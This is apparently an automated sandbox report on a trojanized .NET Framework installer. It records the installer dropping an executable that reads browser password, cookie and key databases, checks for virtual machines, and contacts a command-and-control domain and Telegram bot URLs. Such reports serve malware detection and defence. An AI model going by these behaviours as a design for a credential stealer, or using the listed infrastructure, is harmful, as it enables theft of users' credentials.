                          Source: Yara matchFile source: 3.0.EQB4OREJ.exe.480000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.1323b3d8.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: EQB4OREJ.exe PID: 6896, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

                          Remote Access Functionality

                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.EQB4OREJ.exe.480000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.1323b3d8.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: EQB4OREJ.exe PID: 6896, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED
                          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                          Valid Accounts | 231 Windows Management Instrumentation | 21 Windows Service | 1 Access Token Manipulation | 11 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
                          Default Accounts | 4 Native API | 1 Registry Run Keys / Startup Folder | 21 Windows Service | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                          Domain Accounts | 3 Command and Scripting Interpreter | Logon Script (Windows) | 11 Process Injection | 21 Obfuscated Files or Information | Security Account Manager | 129 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                          Local Accounts | 2 Service Execution | Logon Script (Mac) | 1 Registry Run Keys / Startup Folder | 1 Timestomp | NTDS | 261 Security Software Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
                          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 241 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 241 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 11 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                          Behavior Graph
                          ID: 1319489 | Sample: dotNetFx40_Full_setup.exe | Startdate: 04/10/2023 | Architecture: WINDOWS | Score: 100

                          Domains: rakishev.net, ip-api.com
                          Signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 8 other signatures

                          dotNetFx40_Full_setup.exe (started)
                            dropped: C:\Users\user\AppData\Local\...\EQB4OREJ.exe, PE32
                            dropped: C:\ProgramData\Microsoft\...\G5K9HNJ7.exe, PE32
                            EQB4OREJ.exe (started)
                              DNS/IP: ip-api.com 208.95.112.1, 49683, 80 TUT-ASUS United States
                              DNS/IP: rakishev.net 104.21.88.34, 49687, 80 CLOUDFLARENETUS United States
                              signature: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                              signature: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                              signature: Tries to harvest and steal browser information (history, passwords, etc)
                            G5K9HNJ7.exe (started)
                              dropped: C:\6c8944922f7b98d0b6cd82b768\sqmapi.dll, PE32
                              dropped: C:\...\SetupUtility.exe, PE32
                              dropped: C:\6c8944922f7b98d0b6cd82b768\SetupUi.dll, PE32
                              dropped: 27 other files (none is malicious)
                              Setup.exe (started)
                                WINWORD.EXE (started)
                                  splwow64.exe (started)
                            conhost.exe (started)

                          Source | Detection | Scanner | Label
                          dotNetFx40_Full_setup.exe | 57% | Virustotal |
                          dotNetFx40_Full_setup.exe | 51% | ReversingLabs | ByteCode-MSIL.Packed.Generic
                          dotNetFx40_Full_setup.exe | 100% | Avira | TR/Dropper.Gen2
                          dotNetFx40_Full_setup.exe | 100% | Joe Sandbox ML |
                          Source | Detection | Scanner | Label
                          C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dll | 0% | Virustotal |
                          C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dll | 0% | ReversingLabs |
                          C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dll | 0% | Virustotal |
                          No Antivirus matches
                          Source | Detection | Scanner | Label
                          rakishev.net | 6% | Virustotal |

                          Source | Detection | Scanner | Label
                          http://rakishev.net | 0% | Avira URL Cloud | safe
                          http://rakishev.net/wp-load.php | 100% | Avira URL Cloud | malware
                          http://rakishev.net/wp-load.php | 11% | Virustotal |
                          http://rakishev.net | 6% | Virustotal |
                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          rakishev.net | 104.21.88.34 | true | false | | unknown
                          ip-api.com | 208.95.112.1 | true | false | | high

                          Name | Malicious | Antivirus Detection | Reputation
                          http://rakishev.net/wp-load.php | false | 11%, Virustotal; Avira URL Cloud: malware | unknown
                          http://ip-api.com/json/?fields=11827 | false | | high

                          Name | Source | Malicious | Antivirus Detection | Reputation
                          https://api.telegram.org/bot | dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.dr | false | | high
                          http://rakishev.net | EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp | false | 6%, Virustotal; Avira URL Cloud: safe | unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmp | false | | high
                          https://t.me/reyvortex | dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.dr | false | | high
                          https://t.me/TheDyer | dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.dr | false | | high
                          http://ip-api.com | EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                        IP | Domain | Country | ASN | ASN Name | Malicious
                                        208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
                                        104.21.88.34 | rakishev.net | United States | 13335 | CLOUDFLARENETUS | false
                                        Joe Sandbox Version:38.0.0 Ammolite
                                        Analysis ID:1319489
                                        Start date and time:2023-10-04 15:57:05 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 38s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:34
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:dotNetFx40_Full_setup.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@13/135@2/2
                                        EGA Information:
                                        • Successful, ratio: 75%
                                        HCA Information:
                                        • Successful, ratio: 92%
                                        • Number of executed functions: 331
                                        • Number of non-executed functions: 91
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, WmiApSrv.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.113.194.132
                                        • Excluded domains from analysis (whitelisted): www.bing.com, ecs.office.com, ocsp.digicert.com, login.live.com, s-0005.s-msedge.net, ctldl.windowsupdate.com, tse1.mm.bing.net, ecs.office.trafficmanager.net, s-0005-office.config.skype.com, arc.msn.com, ecs-office.s-0005.s-msedge.net
                                        • Execution Graph export aborted for target dotNetFx40_Full_setup.exe, PID 6744 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                        • Report size getting too big, too many NtEnumerateKey calls found.
                                        • Report size getting too big, too many NtOpenKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        Time      Type             Description
                                        15:57:58  API Interceptor  67x Sleep call for process: EQB4OREJ.exe modified
                                        15:58:00  API Interceptor  10331438x Sleep call for process: splwow64.exe modified
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (627), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):74214
                                                            Entropy (8bit):4.180711029644354
                                                            Encrypted:false
                                                            SSDEEP:384:4w1hDxsSsxGMZzhKtQOsitz0SBijTJ3ejrwddv:PhDxsnxGMdAVBijTJ3eHm
                                                            MD5:C5BF74C96A711B3F7004CA6BDDECC491
                                                            SHA1:4C4D42FF69455F267CE98F1DB8F2C5D76A1046DA
                                                            SHA-256:6B67C8A77C1A637B72736595AFDF77BDB3910AA9FE48D959775806A0683FFA66
                                                            SHA-512:2F2071BF9966BFFE64C90263F4B9BD5EFCAC4F976C4E42FBDEAA5D6A6DEE51C33F4902CF5E3D0897E1C841E9182E25C86D42E392887BC3CE3D9ED3D780D96AC9
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):17240
                                                            Entropy (8bit):5.619267132242324
                                                            Encrypted:false
                                                            SSDEEP:192:Ea4ZUfwxW1NX2QxqaSzWUrfncpNWLIeWkQKPnEtObMacxc8hjXHUz1TrOKA+nfW6:Nx2SX2vPzBrSNWkeWkLXci2jXHU46iQ
                                                            MD5:35B62B395968B7754C298FBB410E9821
                                                            SHA1:DE95297EE33466DDA2A63C8658E79F17EBBB2911
                                                            SHA-256:4BC6711145430AC74F0D8F80A41DD89ACE79427EBAF7D3CFE479A43DB08D66E1
                                                            SHA-512:CD34802098D57CA81446B32D2CD39B3B3FA659ED0A366167C09DAD5FF583B2266E28BA044486E343E4336A40E85D4A713E4E67EAC00B6CBFC3D4C33A1B9BD23B
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious
                                                            • Filename: , Detection: malicious
                                                            Reputation:moderate, very likely benign file
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1256, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):7567
                                                            Entropy (8bit):4.307679152385702
                                                            Encrypted:false
                                                            SSDEEP:192:sf3yLpQxL75CD7sH08JUXthIT2M+bOx7BnT7QUm2:AyLpQxL7YsH08JUXQT2M+s7BnT7QUm2
                                                            MD5:AF1A4F6740A8B51683DFD89D520EB729
                                                            SHA1:6B02C8E704D2D90DE9E0B63FA389B2899C75E567
                                                            SHA-256:E4BA6C3852C94BB2034DFFED5A0FE45150E873B98ABA95A2C3A93A71227EF605
                                                            SHA-512:C669728CA1AF1513DB36EAEE9F15AA7B0209E2F9E85C7FAE759794D05DEEF2920712C9C6F7AAF4ED1B13BF83D310DF6E770CD6C9A49D7FE62FD5F9A11464B255
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (457), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):60816
                                                            Entropy (8bit):4.3418522371704045
                                                            Encrypted:false
                                                            SSDEEP:384:4wCGbCWB6rFk+2jP8lxtrzh1hsPN7ODPnPgQy50sJCXnofDPiv:tbCWYFrewYTJCf
                                                            MD5:967A6D769D849C5ED66D6F46B0B9C5A4
                                                            SHA1:C0FF5F094928B2FA8B61E97639C42782E95CC74F
                                                            SHA-256:0BC010947BFF6EC1CE9899623CCFDFFD702EEE6D2976F28D9E06CC98A79CF542
                                                            SHA-512:219B13F1BEEB7D690AF9D9C7D98904494C878FBE9904F8CB7501B9BB4F48762F9D07C3440EFA0546600FF62636AC34CB4B32E270CF90CB47A9E08F9CB473030C
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14168
                                                            Entropy (8bit):5.9724110685335825
                                                            Encrypted:false
                                                            SSDEEP:192:fc2+tUfwZWPl53LmlVlSW1g+/axw0lczWpXEWUQKPnEtObMacxc8hjeyveCXzHbk:hzuwLmlCW1g+/kmzWpXEWULXci2jpv3e
                                                            MD5:7C136B92983CEC25F85336056E45F3E8
                                                            SHA1:0BB527E7004601E920E2AAC467518126E5352618
                                                            SHA-256:F2E8CA58FA8D8E694D04E14404DEC4E8EA5F231D3F2E5C2F915BD7914849EB2B
                                                            SHA-512:06DA50DDB2C5F83E6E4B4313CBDAE14EED227EEC85F94024A185C2D7F535B6A68E79337557727B2B40A39739C66D526968AAEDBCFEF04DAB09DC0426CFBEFBF4
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exe, Detection: malicious
                                                            • Filename: , Detection: malicious
                                                            • Filename: , Detection: malicious
                                                            • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious
                                                            • Filename: , Detection: malicious
                                                            • Filename: TinyTakeSetup_v_5_2_16.exe, Detection: malicious
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 950, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):6309
                                                            Entropy (8bit):4.470827969332999
                                                            Encrypted:false
                                                            SSDEEP:96:/R8NRf8TTVKTu4LuTu4LrzZD41raZM4HbegdxqKZJQ1/FSMZJujgzc/MpD1JzIf2:/R4Rfm2NBZMjOfro2n6CA2
                                                            MD5:6F2F198B6D2F11C0CBCE4541900BF75C
                                                            SHA1:75EC16813D55AAF41D4D6E3C8D4948E548996D96
                                                            SHA-256:D7D3CFBE65FE62DFA343827811A8071EC54F68D72695C82BEC9D9037D4B4D27A
                                                            SHA-512:B1F5B812182C7A8BF1C1A8D0F616B44B0896F2AC455AFEE56C44522B458A8638F5C18200A8FB23B56DC1471E5AB7C66BE1BE9B794E12EC06F44BEEA4D9D03D6F
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (660), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):80970
                                                            Entropy (8bit):3.7136351704498183
                                                            Encrypted:false
                                                            SSDEEP:384:4w9jRY/svLov/QvQovOLeyndT/jfB7eyNdT9eTiyn15byYOMbqav8qAMrZEXw/Fm:Wt/jPvoZJZ0z
                                                            MD5:0B6ED582EB557573E959E37EBE2FCA6A
                                                            SHA1:82C19C7EAFB28593F453341ECA225873FB011D4C
                                                            SHA-256:8A0DA440261940ED89BAD7CD65BBC941CC56001D9AA94515E346D57B7B0838FC
                                                            SHA-512:ABA3D19F408BD74F010EC49B31A2658E0884661D2EFDA7D999558C90A4589B500570CC80410BA1C323853CA960E7844845729FFF708E3A52EA25F597FAD90759
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.308536555634371
                                                            Encrypted:false
                                                            SSDEEP:384:sIr67PAteQx2PoipahxPh1KuMWp1eWCLXci2jpvsH:sv6CMi2jpvsH
                                                            MD5:62876C2FE28B1B5C434B9FAD80ABE9F9
                                                            SHA1:BE3D479204B8E36933E0EECC250C330E69A06D02
                                                            SHA-256:36E316718C8BBBD7B511E9074FC0EECB9ACD0A9B572F593A5A569CC93276D932
                                                            SHA-512:FFDD2D8DB4AE62EA07178677D8C8745CF54D7EDBE1683478A2C588D5B84EF9EA970E2B1C44E3B8F18B33D189655B0C42D5747392DB97176A38FAB4CBAB3E3F10
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: dotNetFx40_Full_x86_x64.exe, Detection: malicious
                                                            • Filename: , Detection: malicious
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1250, default language ID 1029
                                                            Category:dropped
                                                            Size (bytes):3726
                                                            Entropy (8bit):5.271587861695615
                                                            Encrypted:false
                                                            SSDEEP:96:4BfgejTQpTfD/g7OyGBB2nZsEAVxfw8EMpDRI/YFkvvApzdYPBGx2:sfN7OHn2nZsEmf+Oa/c2
                                                            MD5:B02C48825414EDCA106C92182D32BC8A
                                                            SHA1:CF00219D69E3CFF9777BABECE1EE9D8CDC776AC9
                                                            SHA-256:C6147000FC34894C724C09CB69FFCE75DD1263B69D063F75466D70B67B3C80DD
                                                            SHA-512:B8AFE051701189F60789D0340FD15E81491456284305B55C4582D0153A2C8CB25F1EDD05F40B50893C7CBB80EC57FF635D764DB5F56AA2E945CF29E9C550E9BA
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (700), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):77748
                                                            Entropy (8bit):3.5770566057374418
                                                            Encrypted:false
                                                            SSDEEP:384:4wvo3sGYQTjtLCpCggWuUyl+JMcf/zmSmRLAgRQJmS+e/JAu1O2Xx+v:9o8GYQTjtLCYggWuUMe+e/J8
                                                            MD5:69925E463A6FEDCE8C8E1B68404502FB
                                                            SHA1:76341E490A432A636ED721F0C964FD9026773DD7
                                                            SHA-256:5F370D2CCDD5FA316BCE095BF22670123C09DE175B7801D0A77CDB68174AC6B7
                                                            SHA-512:5F61ABEC49E1F9CC44C26B83AA5B32C217EBEBA63ED90D25836F51F810C59F71EC7430DC5338EFBA9BE720F800204891E5AB9A5F5EC1FF51EF46C629482E5220
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):18264
                                                            Entropy (8bit):5.237828095883879
                                                            Encrypted:false
                                                            SSDEEP:384:cNX61hALPTIOWWptfeWuLXci2jXHUgyh1J:cQweMi2jXHUgU1J
                                                            MD5:9F0CD8981979154CC2A6393DA42731C5
                                                            SHA1:AFFAFE8CF152C25DF75CF3E6B67B7AA8A4A80056
                                                            SHA-256:30C86AE90DE0EE7D2A637AB7EF7AE450690A55A5EA8C007169BAB57B10F0E013
                                                            SHA-512:036253A9B4718EC38C7784ABA6AA124E4A334170AD13546126B0D746F003A4FC571165DBDA3BC3DD1911C343326CAE22C0A3C0A82A17D7F5943D2F2057E3C060
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            • Antivirus: Virustotal, Detection: 0%
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                            Category:dropped
                                                            Size (bytes):3314
                                                            Entropy (8bit):5.229229499381171
                                                            Encrypted:false
                                                            SSDEEP:96:MTBfIGPzxT1B9TwDXOC1uJzGTcDC5bhPqljShnEGiBe4YOMpDIbu0L9D+Ogp+Ogj:If/Jqn1uJzGTcDC5bhSljShnEGioDOOa
                                                            MD5:B756C9B475E1E5955D8BF1544DF556F7
                                                            SHA1:03ACD306196D5C0CDFBEB947CE3E018C08FD08CB
